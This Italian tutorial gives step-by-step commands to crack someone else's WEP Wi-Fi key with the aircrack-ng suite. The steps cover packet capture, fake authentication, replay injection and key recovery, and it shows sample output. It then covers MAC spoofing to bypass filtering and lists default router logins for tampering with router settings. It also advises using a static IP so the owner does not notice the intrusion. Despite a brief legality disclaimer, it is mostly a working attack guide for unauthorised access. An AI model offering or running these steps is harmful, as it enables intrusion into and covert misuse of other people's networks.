Come ottenere una chiave wep

La seguente guida è fornita a scopo conoscitivo.

E’ illegale ottenere la password e accedere ad una rete altrui senza il consenso del proprietario.

Ognuno poi faccia il meglio che crede…

 

Come
ottenere una chiave wep

NECESSARIO

  • la
    buona rete


    La rete wireless deve essere criptata con una chiave WEP
    statica (per capirlo prima di avventurarsi, è sufficiente voler
    connettersi, a quel punto verrà chiesta la password specificando se
    si tratta di WEP o WPA/PSK).


    La rete non deve essere troppo lontana. Il limite della ricezione
    è attorno al 10%
    (fare attenzione al fatto che si tratta di un
    valore relativo al s.o., al driver, etc). Naturalmente una maggior
    ricezione velocizza la procedura. In metri corrisponde ad
    un’ottantina massimo senza ostacoli e trenta circa attraverso muri.

     

  • Il
    buon materiale

    – una buona carta wireless.
    Ciò significa che la carta deve essere patchabile per l’iniezione
    di pacchetti (informarsi prima di procurarsela; normalmente i
    chipset Atheros lo sono, tenere conto dei driver utilizzati,
    ad esempio, per i ath5k non è necessaria la patch, poiché già
    predisposti all’iniezione). Fare attenzione non alla marca (per es.
    netgear), ma al chipset (per es. atheros).

    – un’antenna. Secondo
    la ricezione può essere più o meno indispensabile. Per i pc
    portatili è praticamente impossibile autocostruirla (a meno di
    smontare mezzo computer) mentre per le schede che dispongono
    dell’uscita connettore N ci sono molte guide disponibili sulla rete
    (http://wireless.iport.it/creare-antenna-wifi.html,
    http://www.irex.it/articolo/antenna-wifi-pringles.html

    ,http://www.napoliwireless.net/doku/doku.php).

     

  • Il
    buon software

    – Purchè, a quanto pare, sia
    possibile utilizzare Windows è vivamente consigliato GNU/Linux.
    Va bene qualsiasi distribuzione che abbia una scheda wireless
    riconosciuta ed un’eventuale patch per l’iniezione (con i ath5k non
    è necessaria, con Backtrack c’è già) ed abbia installato la suite
    aircrack-ng.

    – Per semplificarsi al massimo
    la vita esiste Backtrack, una distribuzione linux live
    appositamente studiata per il testing delle reti in cui si trovano
    già tutti gli strumenti necessari. E’ sufficiente scaricare
    l’immagine .iso da www.remote-exploit.net/backtrack,
    masterizzarla e lanciare il boot da cd. Ne esistono anche
    altre, come nUbuntu.

POSTPRE-REQUISITI

  • Buona rete, buon materiale e
    buon software, si può quasi iniziare. Immaginiamo in gran massima
    di usare Backtrack.

  • Da terminale

    $
    su

la
password da inserire è
toor

questo
permetterà di agire in qualità di root (si vede nel terinale poiché
l’ultimo carattere della stringa
ordi@ordi~
# è un cancelletto e non più un $)

  • #iwconfig

permette
di capire che se il sistema vede la scheda, come si chiama (e
indirettamente che driver usa).

ordi@ordi-laptop:~#
iwconfig

lo
no wireless extensions.

wmaster0
no wireless extensions.

wlan0
IEEE 802.11bg ESSID:""

Mode:Managed
Frequency:2.437 GHz Access Point: 00:1D:6A:A8:08:E6

Bit
Rate=1 Mb/s Tx-Power=20 dBm

Retry
min limit:7 RTS thr:off Fragment thr=2352 B

Power
Management:off

Link
Quality=73/100 Signal level:-56 dBm Noise level=-103 dBm

Rx
invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx
excessive retries:0 Invalid misc:0 Missed beacon:0

eth0
no wireless extensions.

La
nostra scheda si chiamerà in questo caso wlan0. Se c’è scritto ath0
sarò una scheda atheros che usa i driver madwifi.

SNIFFARE

  • Il
    primo passo è sniffare il traffico rete. Innanzitutto occorre che
    la scheda di rete sia in mode monitor. Se si utilizzano i
    driver madwifi:

    #wlanconfig
    ath0 destroy

    #wlanconfig
    ath0 create wlandev wifi0 wlanmode monitor

  • Utilizzando
    altri driver, tra cui gli ath5k per i chipset atheros, occorre dare:

    #airmon-ng
    start wlan0

    Ciò
    creerà un’interfaccia virtuale mon0, che dovremo sostituire nei
    prossimi comandi a ath0

  • #
    airodump-ng -w test –-ivs [se vogliamo -c 11 e/o –bssid ] ath0

    Ho
    notato che delle volte è necessario specificare il canale, poiché
    altrimenti si riceve un errore nei passi successivi.

  • Adocchiare
    nella lista delle reti quelle WEP, le wep il cui pwr e rxq siano più
    alti e con parecchi beacons. Attendere che una station si
    connetta
    alla rete prescelta. Se nessuno dovesse connettersi: a)
    aver pazienza e lasciare girare airodump, guardando di tanto in
    tanto i risultati in /home/test.txt b) assicurarsi di essere
    abbastanza vicini alla rete (e quindi, eventualmente perfezionare la
    propria antenna) c) con backtrack2 e scheda.

SOLLECITARE PACCHETTI

  • #aireplay-ng
    -1 0 -e NOMERETE -h NO:ST:RO:MA:CC [-a BSSID] ath0

  • Se
    tutto va bene, l’output del comando dovrebbe felicitarsi per
    l’avvenuta autentificazione con un 🙂

  • Se
    dovessero invece esserci problemi

prestare
attenzione al fatto che potrebbe esserci un filtraggio di
indirizzi mac

Nel
caso, occorre cambiare il nostro indirizzo e sostituirlo con
quello presente nella colonna station di airodump-ng (in termini
tecnici: mac-spoofing). Per far ciò, appuntato l’indirizzo, occorre
seguire tale procedura se si hanno driver madwifi:

#
wlanconfig ath0 destroy
# ip link set dev wifi0 down
#
macchanger -m IN:DI:RI:ZZ:OM:AC wifi0
# ip link set dev wifi0 up
#
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

oppure
quest’altra se si posseggono i ath5k:

# ip link set wlan0 down
# macchanger -r wlan0
# sudo ip link set dev wlan0 up
c'è da dire che la procedura con i driver ath5k sembra essere sperimentale: il cambio avviene felicemente, ma il dhclient non riesce ad acquisire l'indirizzo ip (i problemi quindi sono dopo, una volta ottenuta la pwd). Patchando debitamente il kernel si dovrebbe riuscire. Più info su https://kerneltrap.org/mailarchive/linux-ath5k-devel/2008/11/21/4197334/thread
    	

CAPTARE PACCHETTI

  • Se
    l’autentificazione è riuscita, è ora di captare i pacchetti:

    #
    aireplay-ng -3 -b BSSID -h MI:OA:DR:ES:MA:C mon0

Con questo vedremo i pacchetti
sfilare. In media sono necessari 200.000 pacchetti, una volta
raggiunti si può passare al passaggio seguente. Nei casi più
fortunati potrebbero essere sufficienti 40000 pacchetti circa (anche
se ciò avviene assai di rado)

DECRIPTARE LA KEY

  • #aircrack-ng
    -z test*.ivs -b BSSID

  • Con
    un po’ di fortuna l’output sarà qualcosa di simile:
    Aircrack-ng 1.0 rc3

 

[00:00:00] Tested 641 keys (got
204749 IVs)

KB
depth byte(vote)

0
0/ 1 33(295936) 16(230144) 30(227584) 2A(222464) 19(221696)

1
32/ 1 84(212736) E5(212480) 81(212224) 89(212224) 0B(211968)

2
3/ 9 F1(224768) 6E(223744) AA(222208) 53(221696) 9D(220672)

3
1/ 3 7D(234240) 45(229120) FE(223744) 68(222720) E9(222464)

4
1/ 4 3D(224768) 92(221952) E7(219136) 15(218880) 8A(218880)

KEY
FOUND!
[
33:35:47:51:37:35:56:47:56:48:47:45:32 ] (ASCII: 35GQ75VGVHGE2 )

Decrypted
correctly: 100%

     

POST DECRIPTAGGIO

  • A
    questo punto, PRIMA di inserire la chiave quando è richiesta è
    opportuno prestare attenzione a qualche
    precauzione.

  • Se
    fin’ora è stato immaginato di utilizzare una live apposita per il
    testing delle reti, d’ora in poi si immaginerà di usare il sistema
    operativo quotidiano, supponendo che questo sia la
    distro
    Ubuntu
    .

  • Se
    c’era un filtraggio mac, perché la connessione vada a buon fine
    occorre seguire la procedura per assumere in qualità di
    fake-address quello del client connesso.

  • Se
    anche non ci fosse un filtro, è buona norma per la propria
    privacy
    di cambiare il proprio mac, attraverso il comando
    macchanger
    -r wlan0
    che
    imposterà un mac casuale per la nostra scheda. Volendo è possibile
    creare un piccolo script.

Per creare lo script
(su una distro Ubuntu):

  • $
    sudo gedit ~/connetti

  • nella
    pagina che si presenta incollare:

sudo
ip link set wlan0 down

sudo macchanger -r wlan0
sudo ip link set wlan0 up
sudo /etc/init.d/networking restart
sudo iwconfig wlan0 rate 1M
sudo iwconfig wlan0 essid NOMERETE channel 11
sudo dhclient wlan0
  • Modificare
    secondo i propri parametri e salvare.

  • Da
    terminale:

    $
    sudo chmod a+x ~/connetti

    per
    rendere lo script eseguibile

  • Aggiungere
    lo script a Sistema>Applicazioni d’avvio

  • Connessi alla rete, è
    possibile modificare qualche parametro sul router (aprire porte,
    disattivare filtro ip, etc).

  • Questi
    sono gli
    indirizzi
    IP

    più comuni dei router:

    192.168.0.1
    192.168.1.1
    10.0.0.1
    10.0.1.1

  • Ecco, invece,alcune delle
    password di default per accedere ai router più diffusi:

  1. Linksys
    Wireless-G VPN Broadband Router
    (
    http://www.linksys.com/products/product.asp?grid=33&scid=35&prid=565
    )

    Default
    Login:

    admin/admin

    Default
    SSID:

    linksys-g

  2. Netgear
    WGR614
    e
    MR814
    Cable/DSL
    Wireless Router 54 Mbps/2.4 Ghz
    (
    http://www.netgear.com/products/prod_details.php?prodID=151&view=
    )

    Default
    Login:

    admin/password

    Default
    SSID:

    NETGEAR

  3. Microsoft
    MN-700 802.11g
    (
    http://www.microsoft.com/hardware/broadbandnetworking/productdetails.aspx?pid=002
    )

    Default
    Login:

    admin

    Default
    SSID:

    MSNHOME

  4. D-Link
    DI-624

    AirPlus XtremeG Access Point
    (
    http://www.dlink.com/products/?model=DI-624
    )

    Default
    Login:

    admin/admin

     

Qui
ce ne sono molte di più
http://www.routerpasswords.com/
e anche qua:
https://www.securinfos.info/passwords-liste-mots-de-passe.html
e qua
http://www.phenoelit-us.org/dpl/dpl.html

     

  • Se le password dovessero
    essere state modificate è il caso di prestare attenzione: il
    possessore della rete non è un utonto di base, ma ha un pochino più
    a cuore la sua sicurezza (in realtà in questo caso è assai
    improbabile che abbia una chiave wep, ma vai a sapere!).

  • Se
    non ci si riesce a connettere potrebbe essere un problema di
    dhcp:
    il router non l’ha attivato. E’ preferibile connettersi tramite un
    ip fisso piuttosto che attivarlo (l’utente potrebbe accorgersi che
    qualcosa non va).

  • Se
    la password risulta errata può essere che la rete utilizzi un
    criptaggio a

    wep dinamica
    ,
    in quel caso è meglio cambiare rete.

3


Comments are disabled.